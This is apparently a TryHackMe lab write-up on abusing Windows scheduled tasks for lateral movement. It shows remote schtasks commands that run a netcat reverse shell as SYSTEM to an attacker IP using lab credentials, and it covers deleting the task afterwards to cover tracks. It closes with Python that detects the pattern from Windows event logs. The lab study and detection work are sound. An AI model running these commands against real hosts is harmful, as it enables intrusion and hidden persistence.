A common Windows feature abused by threat actors to move laterally and maintain persistence is scheduled tasks. Threat actors favour it because it is available on every Windows installation.
Note: Thanks mura
This blog post demonstrates the method using Task 4 of the Lateral Movement and Pivoting room provided by TryHackMe.
How to create a scheduled task on a remote host
schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<payload>" /sc ONCE /sd 01/01/1970 /st 00:00
Command breakdown:
/s = the remote host to issue the command to
/RU = run the task as the specified user account (defaults to the current user account)
/create = create the task
/tn = task name (e.g. "mytask")
/tr = task run (the command to execute)
/sc = schedule frequency (MINUTE, HOURLY, DAILY, ONCE, etc.)
/sd = start date, the date on which to execute the task
/st = start time, the time of execution
/u = domain username used to connect
/p = password; if left blank you will be prompted for it
Since a scheduled task can be run manually, the /sd and /st parameters are not important in this scenario.
Manual task execution
schtasks /s TARGET /run /TN "THMtask1"
Like a good threat actor, we want to clean up after ourselves by deleting the task:
schtasks /S TARGET /TN "THMtask1" /DELETE /F
Demo TIME
Let's start by creating our payload using msfvenom.
After creating the payload we need a way to get it onto the host. In this scenario I have a set of credentials that gives me access to an SMB share, to which I can upload my reverse shell.
Now that the reverse shell has been uploaded, I need to create the task. Since the task will run as a privileged user, I need to specify credentials (please ignore the formatting, the TryHackMe attack box sucks).
schtasks /s 10.200.51.201 /RU "SYSTEM" /create /tn "THMtask69" /tr "c:\tools\nc64.exe -e cmd.exe 10.50.49.81 4443" /sc ONCE /sd 01/01/1925 /st 00:00 /u ZA.TRYHACKME.COM\t1_leonard.summers /p EZpass4ever
schtasks /s 10.200.51.201 /run /TN "THMtask69" /u ZA.TRYHACKME.COM\t1_leonard.summers /p EZpass4ever
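From the defender's side, the create, run and delete sequence shown above leaves a trail in the Security log: event 4698 (task created, carrying the task XML), event 4699 (task deleted) and the type 3 network logon (event 4624) that a remote schtasks /s rides on. The Python below is an added example and not part of the original post or the TryHackMe room; the sample events, logon ID, IP 10.0.0.5 and the indicator regex are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Namespace of the Task Scheduler XML carried in Security event 4698's TaskContent field.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_SID = "S-1-5-18"
# Indicator patterns are an assumption for this example; tune them to your environment.
SUSPICIOUS_CMD = re.compile(r"(nc64?\.exe|-e\s+cmd\.exe|\\tools\\|\\temp\\)", re.I)

def parse_task_content(xml_text):
    """Return (command line, run-as principal) from a 4698 TaskContent document."""
    root = ET.fromstring(xml_text)
    cmd = root.findtext(".//t:Exec/t:Command", default="", namespaces=NS)
    args = root.findtext(".//t:Exec/t:Arguments", default="", namespaces=NS)
    user = root.findtext(".//t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    return f"{cmd} {args}".strip(), user

def analyze(events, cleanup_window=timedelta(minutes=10)):
    """Scan chronologically ordered 4624/4698/4699 events and return alert strings."""
    # Logon IDs established over the network (type 3), which is what a remote schtasks /s produces.
    network_logons = {e["TargetLogonId"] for e in events
                      if e["EventID"] == 4624 and e["LogonType"] == 3}
    created, alerts = {}, []
    for e in events:
        ts = datetime.fromisoformat(e["Time"])
        if e["EventID"] == 4698:  # task created
            cmdline, run_as = parse_task_content(e["TaskContent"])
            created[e["TaskName"]] = ts
            reasons = [msg for hit, msg in (
                (e["SubjectLogonId"] in network_logons, "created over a network logon (remote schtasks /s)"),
                (run_as == SYSTEM_SID, "runs as SYSTEM (/RU SYSTEM)"),
                (SUSPICIOUS_CMD.search(cmdline), f"suspicious action: {cmdline}")) if hit]
            if reasons:
                alerts.append(f"{e['TaskName']}: " + "; ".join(reasons))
        elif e["EventID"] == 4699 and e["TaskName"] in created:  # task deleted
            age = ts - created[e["TaskName"]]
            if age <= cleanup_window:  # create -> run -> delete within minutes is the cleanup pattern
                alerts.append(f"{e['TaskName']}: deleted {int(age.total_seconds())}s after creation")
    return alerts

# Constructed sample events mirroring the create/run/delete sequence above (not real logs).
TASK_XML = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
<Actions Context="Author"><Exec><Command>C:\\tools\\nc64.exe</Command><Arguments>-e cmd.exe 10.0.0.5 4443</Arguments></Exec></Actions>
</Task>"""
SAMPLE_EVENTS = [
    {"EventID": 4624, "Time": "2024-01-01T10:00:00", "LogonType": 3, "TargetLogonId": "0x3e7a1"},
    {"EventID": 4698, "Time": "2024-01-01T10:00:05", "SubjectLogonId": "0x3e7a1", "TaskName": "\\THMtask69", "TaskContent": TASK_XML},
    {"EventID": 4699, "Time": "2024-01-01T10:01:30", "SubjectLogonId": "0x3e7a1", "TaskName": "\\THMtask69"},
]
```

Events 4698 and 4699 are only written when the "Other Object Access Events" audit subcategory is enabled, so check that before relying on this logic.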